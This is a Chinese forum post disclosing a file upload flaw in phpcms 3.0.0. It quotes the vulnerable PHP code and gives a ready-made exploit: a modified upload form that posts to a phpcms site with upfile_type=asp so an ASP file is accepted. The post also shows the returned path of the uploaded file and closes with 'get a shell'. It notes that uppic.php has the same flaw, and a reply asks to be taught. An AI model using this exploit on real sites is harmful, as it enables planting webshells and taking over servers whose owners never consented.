phpcms 3.0.0文件上传漏洞
<P>漏洞文件: ads/upload.php、uppic.php<BR><BR>代码如下: </P><DIV>require PHPCMS_ROOT."/class/upload.php";<BR><BR>if(!$_userid) message("请您先登录或注册!" , PHPCMS_PATH."member/login.php");<BR><BR>if($extid==1) {<BR>$upfile_type= "jpg|png|gif";<BR>} elseif ($extid==2) {<BR>$upfile_type= "swf";<BR>}<BR><BR>if($action=='upload')<BR>{<BR> $fileArr = array(<BR> 'file'=>$uploadfile,<BR> 'name'=>$uploadfile_name,<BR> 'size'=>$uploadfile_size,<BR> 'type'=>$uploadfile_type<BR> );<BR><BR> $showname= $fileArr['name'];<BR> $tmpext=strtolower(fileext($showname));<BR> $tmpfilesize=$fileArr['size'];<BR> $savepath = 'ads/'.$upfile_dir.'/'.date('Ym');<BR> $f->create(PHPCMS_ROOT."/".$savepath);<BR> $up = new upload($fileArr,'',$savepath,$upfile_type,1,$upfile_size);<BR> ...........</DIV><BR>很显然,upfile_type变量过滤不够严格,可以自定义上传类型,实践得知可以上传除*.php和*.php3的其它任意后缀的文件,<BR>因为PHPCMS_ROOT."/class/upload.php"这个文件经过Zend加密,所以无法直接分析。
<DIV><BR>$_userid是靠session获取的,所以注册个用户,登录后,开始利用漏洞,修改后的上传页面如下<BR>
<DIV><head><BR><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><BR><title>上传</title><BR><meta name="keywords" content=""><BR><meta name="description" content=""><BR><meta name="generator" content="Phpcms "><BR><link href="/templates/default/skins/default/style.css" rel="stylesheet" type="text/css"><BR></head><BR><BR><body><BR><script language="javascript" type="text/javascript"><BR><!--<BR>function checkform()<BR>{<BR>if(document.getElementById("uploadfile").value=='') { alert("请选择要上传的文件!"); return false;}<BR>}<BR>//--><BR></script><BR><table cellpadding="0" cellspacing="0" border="0" width="100%" height="5"><BR><tr><BR><BR> <td ></td><BR></tr><BR></table><BR><form name="upload" method="post"<BR>action="http://www.phpcms.cn/ads/upload.php?action=upload&url=&upfile_type=asp" enctype="multipart/form-data" onSubmit="return checkform();"><BR><table cellpadding="2" cellspacing="1" class="tableborder"><BR><tr><BR><th>文件上传</th><BR></tr><BR><tr><BR><td class="tablerow" height="30"><BR>选择:<input name="uploadfile" type="file" id="uploadfile" size="20" /><BR><BR><input type="hidden" name="MAX_FILE_SIZE" value="" /><BR><input type="hidden" name="channelid" value="0" /><BR><input type="submit" name="submit" value=" 上传 "><BR></td><BR></tr><BR></table><BR></form><BR><BR></body><BR></html></DIV><BR>现在可以上传asp文件了,用登录后的窗口打开这个文件(保存session),上传的文件名后缀跟form表单里action属性的upfile_type变量是一样的,上传后返回页面源代码如下:
<DIV> var ctl_hurl=window.opener.document.getElementById("");<BR> var ctl_upbutten=window.opener.document.getElementById("upload");<BR> ctl_hurl.value="ads/uploadfile/200612/20061206054522605.asp";<BR> ctl_hurl.style.background="white";<BR> self.close();<BR> </script></DIV><BR>Okay, get a shell<BR><BR>还有uppic.php也有同样漏洞,漏洞代码如下
<DIV> $fileArr = array('file'=>$uploadfile,'name'=>$uploadfile_name,'size'=>$uploadfile_size,'type'=>$uploadfile_type);<BR> <BR> $uploadfiletype = $uploadfiletype ? $uploadfiletype : $_PHPCMS['uploadfiletype'];<BR> $savepath = $uploaddir ? $channeldir."/".$uploaddir."/".date("Ym")."/" : $_PHPCMS['uploaddir']."/".date("Ym")."/";</DIV>利用原理一样................... -:)</DIV>
re:phpcms 3.0.0文件上传漏洞
<P>海哥``我跟你学`````我的QQ240082713</P>
页:
[1]